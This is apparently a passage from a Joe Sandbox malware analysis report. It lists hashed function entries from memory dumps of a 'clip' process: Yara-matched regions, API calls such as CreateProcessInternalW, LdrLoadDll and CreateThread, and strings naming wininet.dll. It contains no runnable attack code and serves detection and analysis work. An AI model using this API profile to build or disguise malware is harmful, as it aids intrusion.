                                                  • Instruction Fuzzy Hash: 399002A520280503F144755C880460700058BD5316F55E011A6075555E8A29DD516135
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a961bc11affbb904725fa273ca93b46d7244300ba70bf271dcb0a6806b029522
                                                  • Instruction ID: 411cc513c3a26273eb15b69b17dda5946108fa777e4e052be6ca5c70779a9770
                                                  • Opcode Fuzzy Hash: a961bc11affbb904725fa273ca93b46d7244300ba70bf271dcb0a6806b029522
                                                  • Instruction Fuzzy Hash: 629002A534240542F104715C8414B060005CBE6315F55E015E5075554D8619DD526126
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8a52fb41d6ffa9b7e2145051f64ab5e45c31f85bdbb029158807d805b1d0529e
                                                  • Instruction ID: 3df848fc3b61dc925706a2f80ef99cc6346414faa67668b556eab344397b4ae5
                                                  • Opcode Fuzzy Hash: 8a52fb41d6ffa9b7e2145051f64ab5e45c31f85bdbb029158807d805b1d0529e
                                                  • Instruction Fuzzy Hash: B3900265602401426144716CC8449064005AFE6225755E121A49A9550D8559D9655665
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 78bbb73a322d33b7f05882c2b0736f7d2b3a005cbd0442d85c132de530144ecc
                                                  • Instruction ID: f36df4cec3cdccf98a32b96a993dd786822518b314e93c436f3b3e2807a4f3a4
                                                  • Opcode Fuzzy Hash: 78bbb73a322d33b7f05882c2b0736f7d2b3a005cbd0442d85c132de530144ecc
                                                  • Instruction Fuzzy Hash: D6900265212C0142F204756C8C14B0700058BD5317F55E115A4165554CC915D9615521
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8c1956380b0f5b172a01b2bd56723a5498722e0a91e8065f3a7c04e756a30b87
                                                  • Instruction ID: 36aae759d97292691264271fa51decf22360a179fabb058bfc35cd4420514230
                                                  • Opcode Fuzzy Hash: 8c1956380b0f5b172a01b2bd56723a5498722e0a91e8065f3a7c04e756a30b87
                                                  • Instruction Fuzzy Hash: 5290026524645202F154715C84046164005ABE5215F55E021A4825594D8555D9556221
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 493d599435f633711d509cbc541591c35389638a6e280c356d8617e1fe7f4abe
                                                  • Instruction ID: 9cbe98a154d6bb7edd90821ed526020cf1f2507bbc96d6d8d4f24861db3c0fd7
                                                  • Opcode Fuzzy Hash: 493d599435f633711d509cbc541591c35389638a6e280c356d8617e1fe7f4abe
                                                  • Instruction Fuzzy Hash: 0E900269222401022149B55C460450B04459BDB365395E015F5427590CC621D9655321
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 50d02c00d628865deeac6893203c1a6c4b4bc9d8c75cfceab040172f698b6a83
                                                  • Instruction ID: cd821d8956df493c9cf61c8f2c73364a756c6abe3c826e1dd857d8ed1b39a18a
                                                  • Opcode Fuzzy Hash: 50d02c00d628865deeac6893203c1a6c4b4bc9d8c75cfceab040172f698b6a83
                                                  • Instruction Fuzzy Hash: 48900269212401032109B55C470450700468BDA365355E021F5026550CD621D9615121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6d122e45a83b1f916c925f9891ceed53d4a78386136db1baeb4a3de09ba723fd
                                                  • Instruction ID: e04dc23a368548d4ca2e3a403ed56be4d9770a2a6c829088ee4696e4c93349a9
                                                  • Opcode Fuzzy Hash: 6d122e45a83b1f916c925f9891ceed53d4a78386136db1baeb4a3de09ba723fd
                                                  • Instruction Fuzzy Hash: FA9002A5203401036109715C8414616400A8BE5215B55E021E5025590DC525D9916125
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 089f6d98868b1cced10ca4dc286a72724c77822e4e233e0746c3cd476035ee02
                                                  • Instruction ID: 60edb512b05e5e0e30396757dc8f00beb8ab6e45bc814f75363a164d5f2b5cd8
                                                  • Opcode Fuzzy Hash: 089f6d98868b1cced10ca4dc286a72724c77822e4e233e0746c3cd476035ee02
                                                  • Instruction Fuzzy Hash: 3790027560640902F154715C841474600058BD5315F55E011A4035654D8755DB5576A1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1a09dbb141a050297d516982d662738a53bb7c63840747ddd84ed9896e47d974
                                                  • Instruction ID: ae1eb622ec50b319a3c0a19f9c44bed10d09005361d7940195d2cf7a30bdd290
                                                  • Opcode Fuzzy Hash: 1a09dbb141a050297d516982d662738a53bb7c63840747ddd84ed9896e47d974
                                                  • Instruction Fuzzy Hash: B190027520240902F184715C840464A00058BD6315F95E015A4036654DCA15DB5977A1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ad2dc90f6f2fe888a9d190108528cc8413144c0d65789bbdf2686e3c1371271a
                                                  • Instruction ID: bb84fe8fb98b433ea45760e93adc2bf712758b6bfa8c273cf7fe545bbc97d384
                                                  • Opcode Fuzzy Hash: ad2dc90f6f2fe888a9d190108528cc8413144c0d65789bbdf2686e3c1371271a
                                                  • Instruction Fuzzy Hash: 8890027520644942F144715C8404A4600158BD5319F55E011A4075694D9625DE55B661
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 0-1269752229
                                                  • Opcode ID: 6cdc233e5b334642c318b4a0d004526adf7bdf7bc354204f0b511cbdaeb84197
                                                  • Instruction ID: 255d29c66e9b0ca0b01a78b1fae04a63d7c7667ef9f35612120dc5c25239c5d3
                                                  • Opcode Fuzzy Hash: 6cdc233e5b334642c318b4a0d004526adf7bdf7bc354204f0b511cbdaeb84197
                                                  • Instruction Fuzzy Hash: EE41637A286B419FC314DF74D894BDAFBA4FF99214F24816EE8994F202C3306142CBE0
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 021C263B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: ca8d93f097ec75e431b48be26b6283072f2a354db714deaccece93f77ec9943c
                                                  • Instruction ID: 34b42bd209db07b6608f978259f7e6a1a4a39a0f7ff18cd12c7ad211df33dd55
                                                  • Opcode Fuzzy Hash: ca8d93f097ec75e431b48be26b6283072f2a354db714deaccece93f77ec9943c
                                                  • Instruction Fuzzy Hash: 8A318BB5641704AFD718EF64C884FEBBBB9BF88704F20852DE9595B240D770BA44CBA0
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 021C263B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 6bd7084c61c83b4215104f79c88f2449923c21c7ca8da17951dbf5585244490a
                                                  • Instruction ID: c75e55aebf35572c2f99101a323fcb03cbd7211d7a915e219ed8043425043e74
                                                  • Opcode Fuzzy Hash: 6bd7084c61c83b4215104f79c88f2449923c21c7ca8da17951dbf5585244490a
                                                  • Instruction Fuzzy Hash: 19319EB5641705AFD714EF64C884FEABBB9BF44304F20426CE9195B284D770AA84CFA4
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 021BE5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: @J7<
                                                  • API String ID: 2538663250-2016760708
                                                  • Opcode ID: d4e6611addd0f9f8418c97846134731f9b5d844e9a1d9d81c0a49716e279f921
                                                  • Instruction ID: d179ed0506e28372fbcc567b66d75e0f68ff41e211c4e40269339690f031e53b
                                                  • Opcode Fuzzy Hash: d4e6611addd0f9f8418c97846134731f9b5d844e9a1d9d81c0a49716e279f921
                                                  • Instruction Fuzzy Hash: D94152B6A002099FDB01DFE8D8809EEB7B9FF88304F508559E505EB214D771EA05CBA0
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 021BE5F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: @J7<
                                                  • API String ID: 2538663250-2016760708
                                                  • Opcode ID: 595f1fdfb072edf3e0c29c22bea1e29437efa4cc9c58f6f00961146ae39bbc1c
                                                  • Instruction ID: 4433915d6f7b46b776134a0b6d03c3c2da5f49b4689513db84181dd582ea441d
                                                  • Opcode Fuzzy Hash: 595f1fdfb072edf3e0c29c22bea1e29437efa4cc9c58f6f00961146ae39bbc1c
                                                  • Instruction Fuzzy Hash: 67312FB5A0060AAFDB10DFE8C8809EFB7B9BF88304F508559E505EB214D775EE45CBA0
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 021B3E72
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 23ed66777d07d4a336a7e54069b82ee4196059ee8bce884f89ec61c0a8e4ac80
                                                  • Instruction ID: 4a5fff676d27a7a25668eb861536655bd939a58085d2f08b47e785dba3cc3ed5
                                                  • Opcode Fuzzy Hash: 23ed66777d07d4a336a7e54069b82ee4196059ee8bce884f89ec61c0a8e4ac80
                                                  • Instruction Fuzzy Hash: FE015EB9D4020DABDF11DAA0EC41FEEB3799F54308F104199E91897240FB31E7188B91
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(021B08D1,021B08F9,021B06D1,00000000,021B7703,00000010,021B08F9,?,?,00000044,021B08F9,00000010,021B7703,00000000,021B06D1,021B08F9), ref: 021C7E60
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                                                  • Instruction ID: 6a3b5da0c483e546f31518a54e0618a1f088b8a8e897fd013f6acce8a6326432
                                                  • Opcode Fuzzy Hash: 450cb9c7663112ca210b0cb6c60cfdfedc45c319147f1a5182a9a80414c57d4f
                                                  • Instruction Fuzzy Hash: 75018CB6214509BFCB44DE99DC81EEB77AEAF8C754F518208BA1DE3240D670F8518BA4
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 021A9305
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: ec1d09ce3e54925c17ae98927fe2e42eff823d399e93492180d79b5bad6aeca9
                                                  • Instruction ID: ed9ae0cff67f351cfd1befa0a61d8baf505ba3970c562aec4e6f17c0dce8e079
                                                  • Opcode Fuzzy Hash: ec1d09ce3e54925c17ae98927fe2e42eff823d399e93492180d79b5bad6aeca9
                                                  • Instruction Fuzzy Hash: 5FF06D773C03043AE26066AA9C02FDBB79C8F94B65F240429F60CEB1C0DA92B54186E8
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 021A9305
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: a2c59b0a1cf75fd5b24ef5f1be27273fcecd08b71946c8df7c4b388ad9e25ceb
                                                  • Instruction ID: fd4ca616680971af946d65d1568f4df34804d825998330b8e958553a517a1621
                                                  • Opcode Fuzzy Hash: a2c59b0a1cf75fd5b24ef5f1be27273fcecd08b71946c8df7c4b388ad9e25ceb
                                                  • Instruction Fuzzy Hash: 86F0927B7C03143AD37066B98C02FDB67688F94B60F34051DF60DAB1C0DA92B5458AA8
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(021B1039,?,021C4793,021B1039,021C4087,021C4793,?,021B1039,021C4087,00001000,?,?,021C95CD), ref: 021C7D5C
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                                                  • Instruction ID: 7429e8c7d62b35457972278ce8c4d9eaf43686d583436ed4b5d46bba50cd09af
                                                  • Opcode Fuzzy Hash: 504fe083870a0fa2096c11ce1490c744b46d51673e052a9510a6b519a7afd9aa
                                                  • Instruction Fuzzy Hash: A0E032BA204204BFD614EA99DC85FDB77ADEF89710F004019BA08A7240D730B9108AB9
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8DF8458B,00000007,00000000,00000004,00000000,021B36E2,000000F4,?,?,?,?,?), ref: 021C7DAF
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 76aaf073e5ea89334c423fe6c257c7112881dff11aa88fd80e51c62d0fc7f01c
                                                  • Instruction ID: a050f708505138846349b4e6fb59c21021bd4aa62939295c0e1b405d0f754587
                                                  • Opcode Fuzzy Hash: 76aaf073e5ea89334c423fe6c257c7112881dff11aa88fd80e51c62d0fc7f01c
                                                  • Instruction Fuzzy Hash: 5CE065BA200204BFE610EF59DC81F9B77ADEFC9710F404418FA08A7240C730B8118EB8
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111), ref: 021B0497
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                  • Instruction ID: 0a8fbc0610be5e89a6d2995522b72a60717e4f1aecd0e5d9b350c51023076a9f
                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                  • Instruction Fuzzy Hash: 73D0A967B4000C3AAA024584ACC1DFFB72CEB88AA6F0080A3FB08E2040E72189060AB0
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,021B1320,021C67A7,021C4087,?), ref: 021B7583
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 2a08f3ffa2bdd49964fac2c9b608de82a7967ee4d802b75ff484d1b742a2a7ae
                                                  • Instruction ID: ae27995f74591d1b3d6aafe390f0cd49b967ad140cb6d66af71a7bf3a0be8658
                                                  • Opcode Fuzzy Hash: 2a08f3ffa2bdd49964fac2c9b608de82a7967ee4d802b75ff484d1b742a2a7ae
                                                  • Instruction Fuzzy Hash: 74D05E7A3C03043BEA40A7B4DC06F9A328D4F54758F254064F90CD72C1EE65F2008A69
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,021B1320,021C67A7,021C4087,?), ref: 021B7583
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: b6c0ced9c9b9cbca6910d25c53a25767d7f8cfdc89efb08a7e2ea0ad13c2dddc
                                                  • Instruction ID: d3c29d00f1ea19342fe795106d56c5c4ec7d8b4829306a7a7cf0ef0ed8239cd9
                                                  • Opcode Fuzzy Hash: b6c0ced9c9b9cbca6910d25c53a25767d7f8cfdc89efb08a7e2ea0ad13c2dddc
                                                  • Instruction Fuzzy Hash: 5BE0177A7C02047EEB50E7B4DC46FEA33595FA4358F254168F90CE72C1EA65A201CA64
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE ref: 021B776C
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                  • Instruction ID: ffbb7dd3463bec708d8c4ba52e54da60dd558ecfa9b5bb40f68e1693dd7686ac
                                                  • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                  • Instruction Fuzzy Hash: 5CC08C362A000808EB2009FCB84D2E3B3588FC233CB240A10F42CD98E0D37298A79001
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c2a2be5dfe1f4fbde6a27ae46288a88d91a2acc1410d66dbc758106be5ba875e
                                                  • Instruction ID: d5cd9e1c71ce45a8100e143f882cba1b10f527a322536386b4dc868fc834e0a3
                                                  • Opcode Fuzzy Hash: c2a2be5dfe1f4fbde6a27ae46288a88d91a2acc1410d66dbc758106be5ba875e
                                                  • Instruction Fuzzy Hash: 03B09B759025C5C5FB15F7644608B1779106BD1715F15D061D6030642F4738D1D1E575
                                                  Strings
                                                  • Address of the debug info found in the active list., xrefs: 043854AE, 043854FA
                                                  • 8, xrefs: 043852E3
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043854CE
                                                  • Critical section debug info address, xrefs: 0438541F, 0438552E
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0438540A, 04385496, 04385519
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043854E2
                                                  • undeleted critical section in freed memory, xrefs: 0438542B
                                                  • Invalid debug info address of this critical section, xrefs: 043854B6
                                                  • Critical section address, xrefs: 04385425, 043854BC, 04385534
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 04385543
                                                  • Critical section address., xrefs: 04385502
                                                  • double initialized or corrupted critical section, xrefs: 04385508
                                                  • Thread identifier, xrefs: 0438553A
                                                  • corrupted critical section, xrefs: 043854C2
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
